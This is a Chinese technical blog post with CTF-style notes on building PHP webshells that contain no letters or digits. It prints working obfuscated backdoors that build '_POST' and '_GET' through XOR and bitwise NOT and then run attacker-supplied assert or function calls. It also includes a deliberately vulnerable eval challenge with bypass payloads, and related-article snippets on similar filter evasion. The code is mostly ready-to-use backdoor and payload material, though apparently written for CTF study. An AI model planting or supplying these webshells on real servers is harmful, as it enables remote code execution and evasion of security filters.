构造不包含字母和数字的webshell

已于 2023-08-20 01:48:06 修改
阅读量357 收藏
点赞数
文章标签: linux 运维 服务器
于 2023-08-20 01:47:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54347738/article/details/132386190
版权

目录

一、不包含字母和数字的webshell

1.简单示例

2、非数字字母的PHP后门

(1)

①assert($_POST['xian']);

②修改为0=assert&1

③通过base64编码

(2)

一、不包含字母和数字的webshell

1.简单示例

环境:php_study+vscode

<?php
    echo "A"^"`";
?>

 ^(异或):相同为0不同为1

A的ASCII值是65,对应的二进制值是0100 0001

`的ASCII值是96,对应的二进制值是0110 0000

异或的二进制的值是00100001,对应的ASCII值是33,对应的字符串的值就是!了

2、非数字字母的PHP后门

(1)

<?php
    $_++;// 1
    $__=("#"^"|"); // _
    $__.=("."^"~");// _P
    $__.=("/"^"`");// _PO
    $__.=("|"^"/");// _POS
    $__.=("{"^"/");// _POST 
    ${$__}[!$_](${$__}[$_]);// $_POST[0]($_POST[1]);
?>

在网页中使用eval无法执行,原因如下:

因为eval是一个语言构造器而不是一个函数,不能被可变函数调用(不可以被动态调用)。

动态调用:传值再加括号并调用的方式

0=eval&1=phpinfo();

0=assert&1=phpinfo();

上面的是无法执行的,下面可行。

①assert($_POST['xian']);

 

测试结果:

 

0提交的是assert

1提交的$POST['xian'],而本是为了执行assert($POST['xian'])

②修改为0=assert&1

依旧执行不成功:

③通过base64编码

此时没有任何http body请求信息,但是连接成功。

assert函数中不可以执行字符串,但可以执行函数或者表达式

('assert',$_POST[1]); 这里面1提交过去的是字符串,assert函数无法执行字符串。

assert(eval())是可以的,assert中执行了eval函数。(base64后多了eval函数)

执行了base64成功:

因为我们多了一个eval函数,实质上我们是在执行assert(eval()),所以是可以执行的。

assert('adsadasdsadasdasdsa') 里面只有字符串

assert(eval(base64dddddd)); 里面有eval函数

 

  简单测试:

<?php call_user_func('assert',$_POST[1]);

 使用base64,执行成功:

(2)

web.php

<?php
include 'flag.php';
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>40){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9]+/",$code)){
        die("NO.");
    }
    @eval($code);
}else{
    highlight_file(__FILE__);
}
//$hint =  "php function getFlag() to get flag";
?>

flag.php

<?php
function getFlag(){
    echo "ctf{i_love_xi'an}";
}

payload:

?code=$_="`{{{"^"?<>/";${$_}[_]();&_=getFlag     {{{与?<>/异或:GET
$_GET[_]();&

 <?php
    echo "`{{{"^"?<>/";//_GET
?>

第二种解法:

?code=$_=~%98%9A%8B%B9%93%9E%98;$_();

%98%9A%8B%B9%93%9E%98为flag

 (3)取反绕过

<?php
$__=('>'>'<')+('>'>'<'); //2
$_=$__/$__;

$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});

$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});

$_=$$_____;
$____($_[$__]);

第二行中,ascii码,>的大于<,所以为1(true),相加为2。

第三行,2/2=1。

Sugababes_12
关注
不用字母数字构造webshell
weixin_46330722的博客
01-21 816
前言 最近做题的时候遇到了许多过滤了字母数字的代码执行,参考了一些大佬的文章后,就想自己写一篇文章来总结一下不用字母数字构造webshell的姿势。 测试代码 <?php $c=$_GET[1]; if(preg_match('/[0-9]|[a-z]/i',$c)){ die("error"); } eval($c); ?> 本文所总结的姿势均用此代码测试。 1 位运算 因为不能用字母数字,所以我们可以通过取反,或,异或等位运算利用特殊字符构造字母数字,再利用php
PHP不包括字母,数字和下划线的webshell
酉酉的博客
10-27 2020
文章目录前言知识铺垫PHP中异或(^)概念PHP取反(~)概念不用数字构造数字用字符串自增,获取字符webshellphp5和7的差异。不用数字字母shell字母数字的字符异或出字母字母数字的字符取反出字母php 递增/递减运算符实例payload不包括数字,字母和下划线的shell实例payload 前言 膜拜下phithon师傅 一些不包含数字字母webshell 另...
包含字母数字webshell
m0_59049258的博客
08-19 489
当$ 和 _ 没有被限制时。
字母数字webshell之命令执行
Pu5073的博客
08-11 475
这里post作为请求体,而code作为get传参,执行完后才会删除临时文件。或者叫period,它的作用和source一样,就是用当前的shell执行一个文件中的命令。比如,当前运行的shell是bash,则。这个通配符的文件有很多,如果先匹配到别的文件则会出现错误,导致整个流程停止,根本不会执行到我们上传的文件。我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是。的意思就是用bash执行file文件中的命令。执行文件,是不需要file有x权限的。
字母数字webshell总结
hackzkaq的博客
05-07 2008
零基础学黑客,搜索公众号:白帽子左一 关于无字母数字Webshell这个话题,可以说是老生常谈了。之前打 CTF 的时候也经常会遇到,每次都让人头大,所谓无字符webshell,其基本原型就是对以下代码的绕过: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } ## 基础知识 ## PHP中的异或 来看这样一段代码: <?php echo "5"^"Z"; ?> 结果
字母数字webshell
weixin_43940853的博客
02-29 1761
构造数字字母webshell 1.异或 可以看到将A和?进行异或可以得到~ 异或的过程就是将字符转化为ascii,再变为二进制进行异或 这里就是将"A"的Ascii码的二进制与"?"的Ascii码的二进制进行异或得到一个新的二进制,在变为Ascii码,最后在变为字符,也就是~ 首先我们实现构造assert($_POST[_]); <?php for ($i=0; $i < 256...
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
字母数字Webshell是指避开常规字母数字字符限制的Webshell构造方法。通常,服务器会通过检测输入是否包含字母数字来防止恶意Webshell的注入。然而,这种防护策略可以通过巧妙的编码转换和利用其他非字母数字...
字母数字webshell进阶收藏版1
08-03
【标题】:“无字母数字webshell进阶收藏版1” 【描述】:本文主要探讨了在Webshell中如何使用无字母数字的Unicode编码进行高级技巧的实现,包括原理、缩短和压榨三个部分。 【正文】: Webshell是一种用于远程...
如何通过非数字与字符的方式实现PHP WebShell详解
08-30
通常,我们编写的WebShell包含字母数字。然而,为了规避WAF检测,我们需要使用不常见的字符组合来构建WebShell。本文主要关注的是如何利用非字母和非数字字符,并通过PHP的动态函数功能来执行构造的代码。在...
ctfshow web41 无字母数字命令执行
Sapphire037的博客
10-30 2329
1 首先,捋一捋思路,我们可以先看过滤的字符 比如/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i或者/[a-z0-9]/is 这里可以先看P神的一些不包含数字字母webshell ,大概意思就是通过一些字符互相运算后构造得到我们的payload,了解基本原理之后,我们再看ctfshow中的这样一道例题 <?php /* # -*- coding: utf-8 -*- # @Author: 羽 # @Date: 2020-09-05 20:31
php webshell 无后门
03-31
php webshell 无后门,未加密
字母数字Webshell
paidx0
08-13 562
字母数字Webshell 直接看题,边看边说 <?php if(isset($_GET['cmd'])){ $cmd=$_GET['cmd']; highlight_file(__FILE__); if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){ die("cerror"); }
无字符webshell
zip471642048的博客
12-14 2176
catflag无字符webshell 本地搭了一个环境,可以看见正则那一块过滤数字字母。 无字符webshell 在PHP中,两个字符串执行异或操作以后,得到的还是一个字符串。所以,我们想得到a-z中某个字母,就找到某两个非字母数字的字符,他们的异或结果是这个字母即可。 <?php '#'^'|'; //得到字符 _ '.'^'~'; //得到字符 P '/'^'`'; //得到字符 0 '|'^'/'; //得到字符 S '{'^'/'; //得到字符 T $_=("#
学习笔记-无字母数字Webshell
人饭子的博客
10-31 1757
字母数字Webshell 相关文章 & Source & Reference 记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字字母的后门) 一些不包含数字字母webshell字母数字Webshell之提高篇 浅析CTF绕过字符数字构造shell 异或绕过 <?php echo "A"^"?"; //输出的结果是字符"~...
字母绕过webshell
最新发布
banliyaoguai的博客
08-13 709
但是抓取临时文件很难因为你上传上去后,没有接收文件,系统就会很快的删除掉你的文件,然后想要接收文件还需要知道文件名字,但是文件名是一个随机字符没有用办法接到。··反引号可以在eval中命令执行在这里的代码就是上面说的匹配上文件,再进行命令执行,然后由于这个是get传参所以需要需要进行url编码,然后就执行成功了。如果可以访问并执行临时文件,就可以进行命令执行了,我们在要上传的文件上写入你要执行的命令,如下图所示。在PHP7中我们可以使用('phpinfo')(),这样的代码执行,如下图。
php5构造字母数字webshell实现任意命令执行
qq_68163788的博客
12-02 1385
Webshell是一种恶意软件,通常指的是通过网络渠道上传到受攻击的服务器上的一段可执行代码。它可以被用来获取对服务器的远程控制权限,执行各种操作包括文件管理、数据库访问、系统命令执行等。
浅析无字符数字构造webshell
Lemon's blog
08-31 2135
前言: 之前在命令执行的时候多少学了一点,但发现如果不自己去动手实践一下会忘的很快,这次就来动手实践一番。恰好最近做了很多有关无字符数字的CTF题,恰好可以作为例子说一下。 基础知识 0x00:PHP中的异或 在PHP中,两个变量的值进行异或时,会先将两个变量的值转换为ASCII,再将ASCII转换为二进制,对两对二进制数据进行异或,异或完,再将结果转为ASCII,最后将ASCII转为字符串,即为最终结果。 异或规则 0&0=0 1&1=0 0&1=1 1&0=1 两个二
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值